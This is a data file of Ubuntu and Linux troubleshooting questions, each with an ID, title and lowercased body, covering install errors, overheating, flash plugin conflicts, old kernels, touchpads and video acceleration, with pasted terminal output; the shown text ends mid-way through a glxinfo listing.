100705	i/o or faulty hard disk error during ubuntu installation	i have two sata hard disk installed in my desktop . when i try to install ubuntu in /dev/sda it shows an error at the end of installation process . error : `` i/o or faulty hard disk or faulty medium '' something like this . i tried to install with several ubuntu cd/dvd , all shows the same error . i have successfully installed fedora on the same partition . i tried to read other dvd/cd to check that my dvd drive is ok . i found that i have no problem in dvd drive , installation cd/dvd . now problem is hard disk . fedora does not show any error or warning about hard disk . and here is the partition table of my hdd : i can not figure out what the actual problem . please help . thanks in advance .
100709	install as user ( not root ) with aptitude to bin and lib in $ home	i need to install some programs on a server where i can not get super user privileges . is there a flag or some way to get aptitude to install in my bin and lib folders in my home directory instead of for the whole system ?
100710	how to get back menu bar in kile after switching to lxde ?	i switched from gnome/unity to lxde on my netbook because it has only 1 gb ram . now the kile window has no menu bar . how does one get it back ? this does not affect all kde applications - for example , kate does have a menu bar .
100711	deciphering hardware damage from sensor info	recently my system has been suffering from what appear to be numerous hardware defects . most critically , my system has apparently been overheating ( under medium load ) and summarily shutting down . one factor which i have already discovered is that the back fan is not spinning . it appears to just be broken because voltage readings ( with a volt meter , not sensors ) on its pins show 12v . i suspect , though , that the fan is n't my only problem . how can i determine the extent of my hardware damage using acpi , sensors or other tools ? i am getting numerous bad readings and i 'm not sure whether they correspond to hardware failures , nonexistent sensors or just misconfigured measurement software . sensors : sensors coretemp-isa-0000 adapter : isa adapter error : ca n't get value of subfeature temp1_input : ca n't read core 0 : +0.0°c ( high = +86.0°c , crit = +100.0°c ) alarm coretemp-isa-0001 adapter : isa adapter error : ca n't get value of subfeature temp1_input : ca n't read core 1 : +0.0°c ( high = +86.0°c , crit = +100.0°c ) alarm f71882fg-isa-0a00 adapter : isa adapter +3.3v : +3.36 v in1 : +1.22 v ( max = +2.04 v ) in2 : +1.02 v in3 : +0.86 v in4 : +0.96 v in5 : +1.10 v in6 : +0.90 v 3vsb : +3.36 v vbat : +3.04 v fan1 : 868 rpm fan2 : 0 rpm alarm fan3 : 0 rpm alarm fan4 : 0 rpm alarm temp1 : +89.0°c ( high = +85.0°c , hyst = +81.0°c ) alarm ( crit = +100.0°c , hyst = +96.0°c ) sensor = transistor temp2 : +33.0°c ( high = +85.0°c , hyst = +81.0°c ) ( crit = +100.0°c , hyst = +96.0°c ) sensor = transistor temp3 : fault ( high = +70.0°c , hyst = +68.0°c ) ( crit = +85.0°c , hyst = +83.0°c ) sensor = transistor and unhelpfully : acpi -v no support for device type : power_supply no support for device type : power_supply cooling 0 : processor 0 of 0 cooling 1 : processor 0 of 7 using the kde plasma widget i can see that temp1 fluctuates between 89-92 while temp2 reads a constant 33 ( ie , it 's broken ) . i never really paid much attention to this until my computer starting getting unnaturally slow under medium loads and summarily dying . then i saw that dmesg was littered with [ 1561.568839 ] cpu1 : core temperature above threshold , cpu clock throttled ( total events = 1 ) [ 1561.568857 ] cpu0 : core temperature above threshold , cpu clock throttled ( total events = 1 ) [ 1800.040047 ] machine check events logged i do n't have much experience with deciphering temperature readings or generally sniffing out bad hardware -- could this whole phenomenon really be explained by a dead back fan ? i 've taken off one of the box panels ( which would seem to offer about as much extra ventilation as the little 4 '' fan ) and the cpu , psu and front-of-the-box fans are all running on full duty cycle but it does n't seem to make any difference . i 'm still getting very high temp readings and frequent shutdowns . what can i do ?
100715	how to set up multiple ip addresses ?	i 'm doing some computer network homework and i 'm supposed to develop some sort of peer to peer file sharing software , and when i wan na test it i need to run a few ( 5 ) instances on my linux/ubuntnu 11.10 . which means each one need to has a unique ip address . i heard i can do that but i dunno how . how can i have many ip addresses on a single computer ? thanks
100719	how to downgrade flash from 11.x to 10.3	ubuntu v11.10 adobe stripped gpu hardware acceleration from flash 11 due to security concerns . that 's great , but i 'd like to the accelerated video that flash 10.3 affords on my nettop . the problem is , i 've looked all over for adobe.com for a legacy version , and there 's none to be found . is there a way i could uninstall flash 11 and install version 10.3 with a package installer or something ? thanks for your help !
100720	how do i record high-resolution ( hd 1080p ) video ?	i have a logitech c910 usb 2.0 usb camera which supports up to 1080p video recording . i am using the camera on a laptop with a intel ( r ) core ( tm ) i5-2410m cpu @ 2.30ghz cpu . ubuntu 11.10 recognises the device and allows me to capture both photos and video . what does not work is high-resolution video recording : i have n't had much luck with anything above vga resolution . cheese appears to be hard-coded to use ogg which puts way too much strain on the cpu . guvcview crashes whichever way i try it . is it possible to record smooth , 25fps video at 1280x720px+ resolutions on linux ?
100721	ubuntu 11.10 64 bit wo n't start after i upgrade it , possible procesor problems ?	i have a hp 630 with an i3 processor on which i run windows 7 64 bit without any problems , i also dual booted ubuntu 10.04 32 bit i believe , now i upgraded to 11.10 and the clean install does n't have any apparent problems . but first thing i update , my ubuntu wo n't start it just goes into the purple screen , or more rarely a black screen with a blinking cursor , where it stays indefenetly . the only clue i could find was that when i entered recovery mode the last instruction which appeared on screen before it friezed was : booting node 0 , processors # 1 after i tried to install the 32 bit version of ubuntu 11.10 from a usb stick it froze at exactly the same instruction and would n't let me install . so it 's a dual core problem , and maybe a bios problem , because it seems that it does n't want to pass from one processor to another , i added to the grub command line maxcpus=1 and it worked but i do n't think it 's healthy and it looks like hell . what is the problem and how do i fix it ?
100729	how to streamline ubuntu installation ? ( started from ubuntu mini )	does any body know how to streamline ubuntu installation ? i mean , i start installing my computer using ubuntu 10.10 mini ( 12,7mb ) and after finish it takes about 800mb of my space ( system with terminal only ) . then add lxde + abiword + gnumeric and it 's size getting bigger more than 1 gb . i try to make iso using relinux and it 's size about 810 mb ( have to burn to dvd ) : ' ( just curious , how ubuntu developer create such full functional system and shipped it with cd around the world ?
100730	how to upgrade to glx 1.3 on ubuntu 10.04	recently i installed firefox 10.00 after which it crashes when i start it . it reported that glxtest process failed ( exited with status 1 ) : glx version older than the required 1.3 my glx info glxinfo | grep version server glx version string : 1.2 client glx version string : 1.4 glx version : 1.2 opengl version string : 1.4 mesa 7.7.1 how to update it ?
100733	why are n't old linux-images removed when installing new kernel updates ?	on my laptop i have limited space but install all new updates , including kernel updates . however , ubuntu does n't seem to uninstall old kernels after ibnstalling a new kernel update . i guess this happens with reason : since the new kernel might fail , and it would be nice if grub provides a way to select the old kernel to boot with . but do i really need the whole history ? , i guess not ! : rc linux-image-2.6.32-21-generic rc linux-image-2.6.32-24-generic rc linux-image-2.6.32-25-generic rc linux-image-2.6.35-22-generic rc linux-image-2.6.35-23-generic rc linux-image-2.6.35-24-generic rc linux-image-2.6.35-25-generic rc linux-image-2.6.35-27-generic rc linux-image-2.6.35-28-generic rc linux-image-2.6.35-30-generic rc linux-image-2.6.38-10-generic rc linux-image-2.6.38-11-generic ii linux-image-2.6.38-12-generic rc linux-image-2.6.38-8-generic ii linux-image-3.0.0-12-generic ii linux-image-3.0.0-13-generic ii linux-image-3.0.0-14-generic ii linux-image-3.0.0-15-generic ii linux-image-3.0.0-16-generic ii linux-image-generic so i thought apt-get autoremove should remove at least some of those images , but it does n't . i will remove those now by hand , but is n't there a way to do this automatically and to keep , lets say tha last three images ? yes a shell script and a cron job ! , alternatives ?
100734	nautilus scripts in top level of contextual menu	is it possible to have nautilus scripts appear in the top level of nautilus ' contextual menu , rather than in a scripts folder ?
100738	skype fails to start after installation from downloaded deb package	i installed skype wiht the amd64.deb file that i downloaded from skype.com but when i click it via dash it wont start . after that i tried it from the gnome-terminal i get this i have a dutch ubuntu i translated it ( well i hope ) bash : /usr/bin/skype : file or directory does not exist i remove it using sudo apt-get remove i then installed it again using sudo dpkg -i skype-ubuntu_2.2.0.35-1_amd64.deb but again same problem i checked in the /usr/bin there is a skype file and the permissions where -rwxr-xr-x 1 root root 21362968 2011-06-08
100742	how can i get multiple columns view in gwibber 3.2.1 ?	gwibber is the closest thing to tweetdeck that we have since adobe dropped air support on linux . i used to have multiple columns and could set up columns for various hastags etc but this functionality seems to have disappeared . the latest version on gentoo is working fine , this seems to be a ubuntu specific issue .
100751	minecraft in jdk 1.7.0_u2 x64	i have ubuntu 11.10 64-bit and i installed jdk 1.7.0 update 2 x64 via webupd8 page . but currently i have problem with minecraft game . after downloading launcher from minecraft.net and lauch the game by java -jar /home/zrebec/downloads/minecraft.jar launcehr is launched normaly , after login the game download the updates but then i got just the black screen with this in terminal : setting user : zrebec , -356009615199623309 exception in thread `` minecraft main thread '' java.lang.unsatisfiedlinkerror : /home/zrebec/.minecraft/bin/natives/liblwjgl.so : /home/zrebec/.minecraft/bin/natives/liblwjgl.so : wrong elf class : elfclass32 ( possible cause : architecture word width mismatch ) at java.lang.classloader $ nativelibrary.load ( native method ) at java.lang.classloader.loadlibrary0 ( classloader.java:1928 ) at java.lang.classloader.loadlibrary ( classloader.java:1825 ) at java.lang.runtime.load0 ( runtime.java:792 ) at java.lang.system.load ( system.java:1059 ) at org.lwjgl.sys $ 1.run ( sys.java:69 ) at java.security.accesscontroller.doprivileged ( native method ) at org.lwjgl.sys.doloadlibrary ( sys.java:65 ) at org.lwjgl.sys.loadlibrary ( sys.java:81 ) at org.lwjgl.sys. < clinit > ( sys.java:98 ) at org.lwjgl.opengl.display. < clinit > ( display.java:132 ) at net.minecraft.client.minecraft.a ( sourcefile:180 ) at net.minecraft.client.minecraft.run ( sourcefile:648 ) at java.lang.thread.run ( thread.java:722 ) please anyone can help me with this ? i think that problem will be in architecture becase : liblwjgl.so : /home/zrebec/.minecraft/bin/natives/liblwjgl.so : wrong elf class : elfclass32 ( possible cause : architecture word width mismatch ) any idea please ? i know , maybe this one is off topic because maybe its not ubuntu problem maybe but in 64-bit works all perfectly and i think that accepted answer can help to many users and can make better playing games under linux . really . thank you very much for any idea .
100752	how does ecryptfs impact harddisk performance ?	i have my home directy encrypted with ecryptfs . does ecryptfs lead to fragmentation ? i have the feeling that reading files , displaying folders and login became continuously slower and slower ( although it was not noticeably slow at the beginning ) . the hard disk makes a lot of seek noise even if i open only a text file . in /home/.ecryptfs i see many big archives ( that probably contain the encrypted files ) , so i 'm wondering if linux file system online defragmentation gains anything here . what options do i have to increase performance ? should i decide whether i maybe better do without encryption ?
100753	is my boot process normal ? it takes 50 seconds boot	here 's my boot.log resume : libgcrypt version : 1.5.0 fsck from util-linux 2.19.1 fsck from util-linux 2.19.1 fsck from util-linux 2.19.1 /dev/sda5 : clean , 668102/3276800 files , 4449436/13107200 blocks /dev/sda2 : recovering journal uhome : recovering journal /dev/sda2 : clean , 3030/74592 files , 200601/297200 blocks ( check in 2 mounts ) uhome : clean , 282203/2621440 files , 8705593/10485760 blocks ( check after next mount ) skipping profile in /etc/apparmor.d/disable : usr.bin.firefox * starting apparmor profiles [ 170g [ 164g [ ok ] * setting sensors limits [ 170g [ 164g [ ok ] invalidating stale software suspend images ... done . * starting mdns/dns-sd daemon [ 164g [ ok ] starting decnet ... * starting network connection manager [ 164g [ ok ] done . * stopping failsafe boot delay [ 164g [ ok ] * stopping system v initialisation compatibility [ 164g [ ok ] * starting system v runlevel compatibility [ 164g [ ok ] * starting bumblebee supporting nvidia optimus cards [ 164g [ ok ] * starting lightdm display manager [ 164g [ ok ] * starting save kernel messages [ 164g [ ok ] * starting acpi daemon [ 164g [ ok ] * starting anac ( h ) ronistic cron [ 164g [ ok ] * starting deferred execution scheduler [ 164g [ ok ] * starting regular background program processing daemon [ 164g [ ok ] * starting automatic crash report generation [ 164g [ [ 31mfail [ 39 ; 49m ] * stopping anac ( h ) ronistic cron [ 164g [ ok ] * starting cpu interrupts balancing daemon [ 164g [ ok ] contents of fstab : # /etc/fstab : static file system information . # # use 'blkid -o value -s uuid ' to print the universally unique identifier # for a device ; this may be used with uuid= as a more robust way to name # devices that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda5 during installation uuid=d30f09f8-9580-4a6b-ac31-f69116793f9f / ext4 errors=remount-ro 0 1 # /boot was on /dev/sda2 during installation uuid=28309a48-2171-4784-8093-d0e5ca40e6de /boot ext4 defaults 0 2 # /home was on /dev/sda6 during installation uuid=4d7ee3e9-bf26-483d-af6e-efcd883126d0 /home ext4 defaults 0 2 # swap was on /dev/sda10 during installation uuid=f1a123f0-c81d-4f0a-9d5c-6780cbf8b9dc none swap sw 0 0 here 's dmesg log : http : //paste.ubuntu.com/826319/' the dmesg log shows quite a bit bump after 6 seconds , it waits too much before starting again at 24th second . output of fdisk -l and mount : http : //paste.ubuntu.com/826397/ i have disabled almost all services which i can , but it still takes 50 seconds to boot . while booting with live usb , it hardly takes 25 seconds . the boot process stops for about 20 seconds at `` resume libcrypt version '' line . and those fscks are performed at every boot . are those fscks necessary ? edit : bootchart
100756	how to increase clipboard size ?	if i try to copy-paste a large amount of text ( from firefox to libreoffice ) , the amount of text thus copied is truncated . what setting / application imposes this limit ( i assume it is the de ) ? and is there anyway to increase the size of the clipboard ?
100758	'adobe-flashplugin conflicts with flashplugin-downloader ' error while trying to install adobe-flashplugin	i 'm having some hard time getting straight with my adobe flash plugin . ( ubuntu 11.10 ) $ sudo apt-get remove -- purge adobe-flashplugin flashplugin* nspluginwrapper reading package lists ... done building dependency tree reading state information ... done note , selecting 'flashplugin-installer ' for regex 'flashplugin*' note , selecting 'flashplugin-downloader ' for regex 'flashplugin*' note , selecting 'adobe-flashplugin ' for regex 'flashplugin*' note , selecting 'flashplugin-nonfree-extrasound ' for regex 'flashplugin*' note , selecting 'flashplugin ' for regex 'flashplugin*' note , selecting 'flashplugin-nonfree ' for regex 'flashplugin*' note , selecting 'adobe-flashplugin ' instead of 'flashplugin-nonfree' package nspluginwrapper is not installed , so not removed package flashplugin-installer is not installed , so not removed package adobe-flashplugin is not installed , so not removed you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : adobe-flash-properties-gtk : depends : adobe-flashplugin ( = 11.1.102.55-0oneiric1 ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . $ sudo apt-get install -- reinstall adobe-flashplugin reading package lists ... done building dependency tree reading state information ... done the following new packages will be installed : adobe-flashplugin 0 upgraded , 1 newly installed , 0 to remove and 0 not upgraded . 1 not fully installed or removed . need to get 0 b/6 709 kb of archives . after this operation , 19,0 mb of additional disk space will be used . dpkg : regarding ... /adobe-flashplugin_11.1.102.55-0oneiric1_amd64.deb containing adobe-flashplugin : adobe-flashplugin conflicts with flashplugin-downloader flashplugin-downloader : i386 ( version 11.1.102.55ubuntu0.11.10.1 ) is present and installed . dpkg : error processing /var/cache/apt/archives/adobe-flashplugin_11.1.102.55-0oneiric1_amd64.deb ( -- unpack ) : conflicting packages - not installing adobe-flashplugin errors were encountered while processing : /var/cache/apt/archives/adobe-flashplugin_11.1.102.55-0oneiric1_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) edit : sudo apt-get remove flashplugin-downloader reading package lists ... done building dependency tree reading state information ... done virtual packages like 'flashplugin-downloader ' ca n't be removed you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : adobe-flash-properties-gtk : depends : adobe-flashplugin ( = 11.1.102.55-0oneiric1 ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . edit # 2 : # apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : adobe-flashplugin the following new packages will be installed : adobe-flashplugin 0 upgraded , 1 newly installed , 0 to remove and 0 not upgraded . 1 not fully installed or removed . need to get 0 b/6 709 kb of archives . after this operation , 19,0 mb of additional disk space will be used . do you want to continue [ y/n ] ? y dpkg : regarding ... /adobe-flashplugin_11.1.102.55-0oneiric1_amd64.deb containing adobe-flashplugin : adobe-flashplugin conflicts with flashplugin-downloader flashplugin-downloader : i386 ( version 11.1.102.55ubuntu0.11.10.1 ) is present and installed . dpkg : error processing /var/cache/apt/archives/adobe-flashplugin_11.1.102.55-0oneiric1_amd64.deb ( -- unpack ) : conflicting packages - not installing adobe-flashplugin errors were encountered while processing : /var/cache/apt/archives/adobe-flashplugin_11.1.102.55-0oneiric1_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) output of sudo apt-get update - https : //gist.github.com/1716225 ... w : failed to fetch http : //ppa.launchpad.net/sevenmachines/flash/ubuntu/dists/oneiric/main/source/sources 404 not found ... any thoughts ?
100759	overriding dsdt did it work ?	i have compiled a kernel using a custom dsdt file . i just want to make sure the kernel is using it . when i run dmesg |grep dsdt i get this : [ 0.000000 ] acpi : override [ dsdt-notebook ] , this is unsafe : tainting kernel [ 0.000000 ] acpi : dsdt @ 0x00000000baf87018 table override , replaced with : [ 0.000000 ] acpi : dsdt ffffffff81c647e0 1013b ( v01 _asus_ notebook 00000000 intl 20111123 ) [ 0.430318 ] acpi : ec : look up ec in dsdt does this mean that it found it is using the custom dsdt or that it found it and replaced it with something not custom ?
100760	how do i enable a touchpad ?	i installed ubuntu 11.10 several months ago , but i have n't found a proper way to enable the touchpad . i once tried something i ca n't recall the name . does any one have any suggestions ? update : here 's what cat /usr/share/x11/xorg.conf.d/50-synaptics.conf shows : # example xorg.conf.d snippet that assigns the touchpad driver # to all touchpads . see xorg.conf.d ( 5 ) for more information on # inputclass . # do not edit this file , your distribution will likely overwrite # it when updating . copy ( and rename ) this file into # /etc/x11/xorg.conf.d first . # additional options may be added in the form of # option `` optionname '' `` value '' # section `` inputclass '' identifier `` touchpad catchall '' driver `` synaptics '' matchistouchpad `` on '' # this option is recommend on all linux systems using evdev , but can not be # enabled by default . see the following link for details : # http : //who-t.blogspot.com/2010/11/how-to-ignore-configuration-errors.html matchdevicepath `` /dev/input/event* '' endsection
100764	how to `` search and replace '' many files ?	i use the grep command to search for a string in many files . is there something similar to `` search and replace '' ?
100765	why does the unity top panel not show the chrome icon ?	it does on gnome shell and cinnamon ( linux mint ) . why not in unity ?
100768	why do firefox , preferred applications and x-www-browser disagree on default browser ?	firefox claims it 's the default browser ( edit - > preferences - > advanced - > check now ) , preferred application also lists it as the default , but x-www-browser runs chrome . is there really more than one setting for the ubuntu default browser ?
100769	is there an equivalent to adobe creative suite ?	adobe has the creative suite - are there any alternatives for ubuntu ?
100773	how do i move applications from one workspace to another	i 'm using 11.10 - please can someone let me know how can i move programs from one workspace to another . i 'm used to the gnome-2 style - is there a way to achieve something similar in 11.10 ?
100780	unable to set input method as ibus in gnome-language-selector	i want to be able to type in hindi and want to set input method as ibus in gnome-language-selector window as shown on this blog http : //www.pinyinjoe.com/images/ubuntu/1104/language-support.jpg how ever each time when i select input method as ibus and close the window i log out and login again.now check the ibus window preferences as in this snapshot https : //picasaweb.google.com/107404068162388981296/unknownasianlanguage # 5704526930860552098 the options to hindi which should come as shown in this snapshot http : //www.muktware.com/sites/default/files/images/applications/ibus-install-3.jpg is missing in my machine . i use ubuntu 11.10 and i do not use unity . i am using gnome which was installed using aptitude install gnome-session-fallback the language support for hindi is already enabled in gnome-language-selector window . what are my options ?
100783	i did somethings with mount-manager.. and i have some small problems	i tried to automount partitions using mountmanager . but i do n't know what i did . pls help . i may find a way to automount but what i need is different i need my sda6 and sda7 to mount at /media . ( but i entered /mnt in mountmanager ) . also some partitions are not showing in nautilus devices list . my fdisk-l disk /dev/sda : 160.0 gb , 160041885696 bytes 255 heads , 63 sectors/track , 19457 cylinders , total 312581808 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x2cf52cf4 device boot start end blocks id system /dev/sda1 * 63 51215219 25607578+ 7 hpfs/ntfs/exfat /dev/sda2 51215281 312576704 130680712 f w95 ext 'd ( lba ) /dev/sda5 51215283 71698094 10241406 7 hpfs/ntfs/exfat /dev/sda6 71698158 163862999 46082421 7 hpfs/ntfs/exfat /dev/sda7 163863063 267530444 51833691 7 hpfs/ntfs/exfat /dev/sda8 308496258 312576704 2040223+ 82 linux swap / solaris /dev/sda9 300111872 308494335 4191232 82 linux swap / solaris /dev/sda10 267532288 291723263 12095488 83 linux /dev/sda11 291725312 300109823 4192256 82 linux swap / solaris partition table entries are not in disk order disk /dev/mapper/cryptswap1 : 4292 mb , 4292870144 bytes 255 heads , 63 sectors/track , 521 cylinders , total 8384512 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x39ee04e1 disk /dev/mapper/cryptswap1 does n't contain a valid partition table i want to reset my fstab or mount settings for sda6 and sda7 and i need my device lists back to normal . pls help i ca n't upload images here . my nautilus devices list shows 26gb filesystem 10gb filesystem
100786	watching videos with hardware acceleration enabled gives me sound but no image	when trying to run mplayer2 with vdpau on a vdpau compatible laptop with nvidia graphics driver , i only get audio from it . my nvidia card should be supported as far as i can see , so i wonder if the problem is that i do n't have the right packages or configuration : avilella @ magneto : ~ $ vainfo libva : va-api version 0.32.0 libva : va_getdrivername ( ) returns 0 libva : trying to open /usr/lib/dri/i965_drv_video.so libva : va_opendriver ( ) returns -1 vainitialize failed with error code -1 ( unknown libva error ) , exit avilella @ magneto : ~ $ optirun vainfo libva : va-api version 0.32.0 libva : va_getdrivername ( ) returns 0 libva : trying to open /usr/lib/dri/i965_drv_video.so libva : va_opendriver ( ) returns -1 vainitialize failed with error code -1 ( unknown libva error ) , exit mplayer -vo vdpau -ao alsa file.mkv failed to open vdpau backend libvdpau_nvidia.so : can not open shared object file : no such file or directory [ vdpau ] error when calling vdp_device_create_x11 : 1 error opening/initializing the selected video_out ( -vo ) device . lspci -vmk | grep -a 8 -b 2 vga device : 00:02.0 class : vga compatible controller vendor : intel corporation device : core processor integrated graphics controller svendor : asustek computer inc. sdevice : device 1362 rev : 18 driver : i915 module : i915 -- device : 01:00.0 class : vga compatible controller vendor : nvidia corporation device : gt218 [ geforce 310m ] rev : ff progif : ff i tried following the hybrid-dump instructions , and i get this : avilella @ magneto : ~/hybrid_graphics/hybrid-windump $ git pull already up-to-date . avilella @ magneto : ~/hybrid_graphics/hybrid-windump $ make clean & & make \rm -f windump.o windump *~ core gcc -o2 -std=gnu99 -pedantic -wall -wextra -c windump.c -o windump.o windump.c : in function âcapture_rootâ : windump.c:56:9 : warning : unused variable âallimageâ [ -wunused-variable ] windump.c:42:12 : warning : unused variable âdummywinâ [ -wunused-variable ] windump.c:41:9 : warning : variable âbwâ set but not used [ -wunused-but-set-variable ] windump.c:40:17 : warning : variable âdheightâ set but not used [ -wunused-but-set-variable ] windump.c:40:9 : warning : variable âdwidthâ set but not used [ -wunused-but-set-variable ] windump.c:35:10 : warning : variable âgot_win_nameâ set but not used [ -wunused-but-set-variable ] windump.c:33:18 : warning : unused variable âiâ [ -wunused-variable ] windump.c:33:9 : warning : unused variable âncolorsâ [ -wunused-variable ] windump.c:32:9 : warning : unused variable âheader_sizeâ [ -wunused-variable ] windump.c:31:9 : warning : variable âwin_name_sizeâ set but not used [ -wunused-but-set-variable ] windump.c:30:14 : warning : unused variable âbuffer_sizeâ [ -wunused-variable ] windump.c:29:13 : warning : unused variable âcolorsâ [ -wunused-variable ] windump.c:28:19 : warning : unused variable âswaptestâ [ -wunused-variable ] windump.c : in function âmainâ : windump.c:280:17 : warning : unused variable âymouseâ [ -wunused-variable ] windump.c:280:9 : warning : unused variable âxmouseâ [ -wunused-variable ] gcc -o windump windump.o -wl , -o2 -wall -wextra -werror -lx11 -lxext -lxfixes avilella @ magneto : ~/hybrid_graphics/hybrid-windump $ ./windump usage : ./windump source target where source and target are x11 display names . example : ./windump :0.0 :0.1 avilella @ magneto : ~/hybrid_graphics/hybrid-windump $ optirun glxinfo name of display : :0.0 display : :0 screen : 0 direct rendering : yes server glx vendor string : virtualgl server glx version string : 1.4 server glx extensions : glx_arb_get_proc_address , glx_arb_multisample , glx_ext_visual_info , glx_ext_visual_rating , glx_sgi_make_current_read , glx_sgix_fbconfig , glx_sgix_pbuffer , glx_sun_get_transparent_index , glx_arb_create_context client glx vendor string : virtualgl client glx version string : 1.4 client glx extensions : glx_arb_get_proc_address , glx_arb_multisample , glx_ext_visual_info , glx_ext_visual_rating , glx_sgi_make_current_read , glx_sgix_fbconfig , glx_sgix_pbuffer , glx_sun_get_transparent_index , glx_arb_create_context glx version : 1.4 glx extensions : glx_arb_get_proc_address , glx_arb_multisample , glx_ext_visual_info , glx_ext_visual_rating , glx_sgi_make_current_read , glx_sgix_fbconfig , glx_sgix_pbuffer , glx_sun_get_transparent_index , glx_arb_create_context opengl vendor string : nvidia corporation opengl renderer string : geforce 310m/pci/sse2 opengl version string : 3.3.0 nvidia 290.10 opengl shading language version string : 3.30 nvidia via cg compiler opengl extensions : gl_arb_base_instance , gl_arb_blend_func_extended , gl_arb_color_buffer_float , gl_arb_compatibility , gl_arb_compressed_texture_pixel_storage , gl_arb_conservative_depth , gl_arb_copy_buffer , gl_arb_depth_buffer_float , gl_arb_depth_clamp , gl_arb_depth_texture , gl_arb_draw_buffers , gl_arb_draw_buffers_blend , gl_arb_draw_elements_base_vertex , gl_arb_draw_instanced , gl_arb_es2_compatibility , gl_arb_explicit_attrib_location , gl_arb_fragment_coord_conventions , gl_arb_fragment_program , gl_arb_fragment_program_shadow , gl_arb_fragment_shader , gl_arb_framebuffer_object , gl_arb_framebuffer_srgb , gl_arb_geometry_shader4 , gl_arb_get_program_binary , gl_arb_half_float_pixel , gl_arb_half_float_vertex , gl_arb_imaging , gl_arb_instanced_arrays , gl_arb_internalformat_query , gl_arb_map_buffer_alignment , gl_arb_map_buffer_range , gl_arb_multisample , gl_arb_multitexture , gl_arb_occlusion_query , gl_arb_occlusion_query2 , gl_arb_pixel_buffer_object , gl_arb_point_parameters , gl_arb_point_sprite , gl_arb_provoking_vertex , gl_arb_robustness , gl_arb_sample_shading , gl_arb_sampler_objects , gl_arb_seamless_cube_map , gl_arb_separate_shader_objects , gl_arb_shader_bit_encoding , gl_arb_shader_objects , gl_arb_shading_language_100 , gl_arb_shading_language_420pack , gl_arb_shading_language_include , gl_arb_shading_language_packing , gl_arb_shadow , gl_arb_sync , gl_arb_texture_border_clamp , gl_arb_texture_buffer_object , gl_arb_texture_compression , gl_arb_texture_compression_rgtc , gl_arb_texture_cube_map , gl_arb_texture_cube_map_array , gl_arb_texture_env_add , gl_arb_texture_env_combine , gl_arb_texture_env_crossbar , gl_arb_texture_env_dot3 , gl_arb_texture_float , gl_arb_texture_gather , gl_arb_texture_mirrored_repeat , gl_arb_texture_multisample , gl_arb_texture_non_power_of_two , gl_arb_texture_query_lod , gl_arb_texture_rectangle , gl_arb_texture_rg , gl_arb_texture_rgb10_a2ui , gl_arb_texture_storage , gl_arb_texture_swizzle , gl_arb_timer_query , gl_arb_transform_feedback2 , gl_arb_transform_feedback_instanced , gl_arb_transpose_matrix , gl_arb_uniform_buffer_object , gl_arb_vertex_array_bgra , gl_arb_vertex_array_object , gl_arb_vertex_buffer_object , gl_arb_vertex_program , gl_arb_vertex_shader , gl_arb_vertex_type_2_10_10_10_rev , gl_arb_viewport_array , gl_arb_window_pos , gl_ati_draw_buffers , gl_ati_texture_float , gl_ati_texture_mirror_once , gl_s3_s3tc , gl_ext_texture_env_add , gl_ext_abgr , gl_ext_bgra , gl_ext_bindable_uniform , gl_ext_blend_color , gl_ext_blend_equation_separate , gl_ext_blend_func_separate , gl_ext_blend_minmax , gl_ext_blend_subtract , gl_ext_compiled_vertex_array , gl_ext_cg_shader , gl_ext_depth_bounds_test , gl_ext_direct_state_access , gl_ext_draw_buffers2 , gl_ext_draw_instanced , gl_ext_draw_range_elements , gl_ext_fog_coord , gl_ext_framebuffer_blit , gl_ext_framebuffer_multisample , gl_extx_framebuffer_mixed_formats , gl_ext_framebuffer_object , gl_ext_framebuffer_srgb , gl_ext_geometry_shader4 , gl_ext_gpu_program_parameters , gl_ext_gpu_shader4 , gl_ext_multi_draw_arrays , gl_ext_packed_depth_stencil , gl_ext_packed_float , gl_ext_packed_pixels , gl_ext_pixel_buffer_object , gl_ext_point_parameters , gl_ext_provoking_vertex , gl_ext_rescale_normal , gl_ext_secondary_color , gl_ext_separate_shader_objects , gl_ext_separate_specular_color , gl_ext_shadow_funcs , gl_ext_stencil_two_side , gl_ext_stencil_wrap , gl_ext_texture3d , gl_ext_texture_array , gl_ext_texture_buffer_object , gl_ext_texture_compression_dxt1 , gl_ext_texture_compression_latc , gl_ext_texture_compression_rgtc , gl_ext_texture_compression_s3tc , gl_ext_texture_cube_map , gl_ext_texture_edge_clamp , gl_ext_texture_env_combine , gl_ext_texture_env_dot3 , gl_ext_texture_filter_anisotropic , gl_ext_texture_format_bgra8888 , gl_ext_texture_integer , gl_ext_texture_lod , gl_ext_texture_lod_bias , gl_ext_texture_mirror_clamp , gl_ext_texture_object , gl_ext_texture_shared_exponent , gl_ext_texture_srgb , gl_ext_texture_srgb_decode , gl_ext_texture_storage , gl_ext_texture_swizzle , gl_ext_texture_type_2_10_10_10_rev , gl_ext_timer_query , gl_ext_transform_feedback2 , gl_ext_vertex_array , gl_ext_vertex_array_bgra , gl_ext_x11_sync_object , gl_ext_import_sync_object , gl_ibm_rasterpos_clip , gl_ibm_texture_mirrored_repeat , gl_ktx_buffer_region , gl_nv_alpha_test , gl_nv_blend_minmax , gl_nv_blend_square , gl_nv_complex_primitives , gl_nv_conditional_render , gl_nv_copy_depth_to_color , gl_nv_copy_image , gl_nv_depth_buffer_float , gl_nv_depth_clamp , gl_nv_explicit_multisample , gl_nv_fbo_color_attachments , gl_nv_fence , gl_nv_float_buffer , gl_nv_fog_distance , gl_nv_fragdepth , gl_nv_fragment_program , gl_nv_fragment_program_option , gl_nv_fragment_program2 , gl_nv_framebuffer_multisample_coverage , gl_nv_geometry_shader4 , gl_nv_gpu_program4 , gl_nv_gpu_program4_1 , gl_nv_half_float , gl_nv_light_max_exponent , 